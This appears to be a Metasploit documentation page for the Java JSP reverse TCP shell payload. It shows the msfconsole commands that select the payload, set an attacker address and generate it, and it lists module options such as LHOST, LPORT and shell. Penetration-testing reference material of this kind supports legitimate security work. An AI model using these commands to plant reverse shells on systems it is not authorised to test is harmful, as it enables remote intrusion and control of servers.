Metasploit Penetration Testing Framework
Java JSP Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell
Rank
Authors
- sf < stephen_fewer [at] harmonysecurity.com >
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/java/jsp_shell_reverse_tcp
msf payload(jsp_shell_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(jsp_shell_reverse_tcp) > generate
Module Options
| LHOST |
The local address |
| LPORT |
The local port (default: 4444) |
| SHELL |
The system shell to use. (default: cmd.exe) |
| AutoRunScript |
A script to automatically on session creation. |
| InitialAutoRunScript |
An initial script to run on session created (before AutoRunScript) |
| ReverseConnectRetries |
The number of connection attempts to try before exiting the process |
| WORKSPACE |
Specify the workspace for this module |